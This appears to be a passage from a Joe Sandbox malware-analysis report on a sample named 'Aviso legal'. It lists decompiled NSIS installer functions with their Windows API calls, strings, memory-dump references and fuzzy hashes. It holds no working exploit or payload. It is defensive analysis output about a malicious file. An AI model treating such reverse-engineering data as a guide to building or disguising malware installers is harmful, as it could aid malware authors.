Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040451D
GetSysColor.USER32(00000000), ref: 0040455B
SetTextColor.GDI32(?,00000000), ref: 00404567
SetBkMode.GDI32(?,?), ref: 00404573
GetSysColor.USER32(?), ref: 00404586
SetBkColor.GDI32(?,?), ref: 00404596
DeleteObject.GDI32(?), ref: 004045B0
CreateBrushIndirect.GDI32(?), ref: 004045BA

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNEL32(?,?,?,00000001,?,?,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 004027CC

Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58

Function 0040559F Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042C248,00000000,?,75E023A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
lstrlenW.KERNEL32(00403418,0042C248,00000000,?,75E023A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Part of subcall function 0040657A: lstrcatW.KERNEL32(00432EA0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32(00432EA0,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID:
API String ID: 1495540970-0
Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68

Function 00404E54 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
GetMessagePos.USER32 ref: 00404E77
ScreenToClient.USER32(?,?), ref: 00404E91
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9

Strings

f, xrefs: 00404EA5

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5

Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
MulDiv.KERNEL32(?,?,?), ref: 00402FDC
wsprintfW.USER32 ref: 00402FEC
SetWindowTextW.USER32(?,?), ref: 00402FFC
SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E

Strings

verifying installer: %d%%, xrefs: 00402FE6

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69

Function 0040689A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
wsprintfW.USER32 ref: 004068EC
LoadLibraryExW.KERNEL32(?,00000000,?), ref: 00406900

Strings

\, xrefs: 004068C2
%s%S.dll, xrefs: 004068E6
UXTHEME, xrefs: 004068A3

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8

Function 0040297E Relevance: 9.1, APIs: 6, Instructions: 77memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040602D: GetFileAttributesW.KERNEL32(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
Part of subcall function 0040602D: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

GlobalAlloc.KERNEL32(?,?), ref: 004029B1

Part of subcall function 004034E5: SetFilePointer.KERNEL32(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3

GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32(?), ref: 00402A06
GlobalFree.KERNEL32(00000000), ref: 00402A19

Part of subcall function 004032B4: GetTickCount.KERNEL32 ref: 0040331E
Part of subcall function 004032B4: GetTickCount.KERNEL32 ref: 004033C5
Part of subcall function 004032B4: MulDiv.KERNEL32(7FFFFFFF,?,?), ref: 004033EE
Part of subcall function 004032B4: wsprintfW.USER32 ref: 00403401

CloseHandle.KERNEL32(?,?,?), ref: 00402A35
DeleteFileW.KERNEL32(?), ref: 00402A48

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: FileGlobal$AllocCountFreeTick$AttributesCloseCreateDeleteHandlePointerwsprintf
String ID:
API String ID: 2082585436-0
Opcode ID: 17dd76fc47bfb4dbddb85748dda62205a1ec4d3ad83027f951bb7188571398cb
Instruction ID: 434b358d1c083f8bba1e209f71a36014b8a9c9b1db249c6204e039f9d1a2e10c
Opcode Fuzzy Hash: 17dd76fc47bfb4dbddb85748dda62205a1ec4d3ad83027f951bb7188571398cb
Instruction Fuzzy Hash: 36217F71D00114ABCF21AFA5DE888DEBE79EF08364F14423AF555762E0CA794C429B68

Function 004067C4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,75E03420,00442800,?,00403508,00442800,00442800,00403810), ref: 00406827
CharNextW.USER32(?,?,?,00000000,?,00403508,00442800,00442800,00403810), ref: 00406836
CharNextW.USER32(?,00000000,75E03420,00442800,?,00403508,00442800,00442800,00403810), ref: 0040683B
CharPrevW.USER32(?,?,75E03420,00442800,?,00403508,00442800,00442800,00403810), ref: 0040684E

Strings

*?|<>/":, xrefs: 00406816

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD

Function 0040176F Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,0040A5F0,0040A5F0,00000000,00000000,0040A5F0,00441000,?,?,00000031), ref: 004017D5

Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A

Part of subcall function 0040559F: lstrlenW.KERNEL32(0042C248,00000000,?,75E023A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,0042C248,00000000,?,75E023A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
Part of subcall function 0040559F: lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
Part of subcall function 0040559F: SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
Opcode Fuzzy Hash: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68

Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84

Part of subcall function 0040657A: lstrcatW.KERNEL32(00432EA0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32(00432EA0,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779

CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID:
API String ID: 2584051700-0
Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
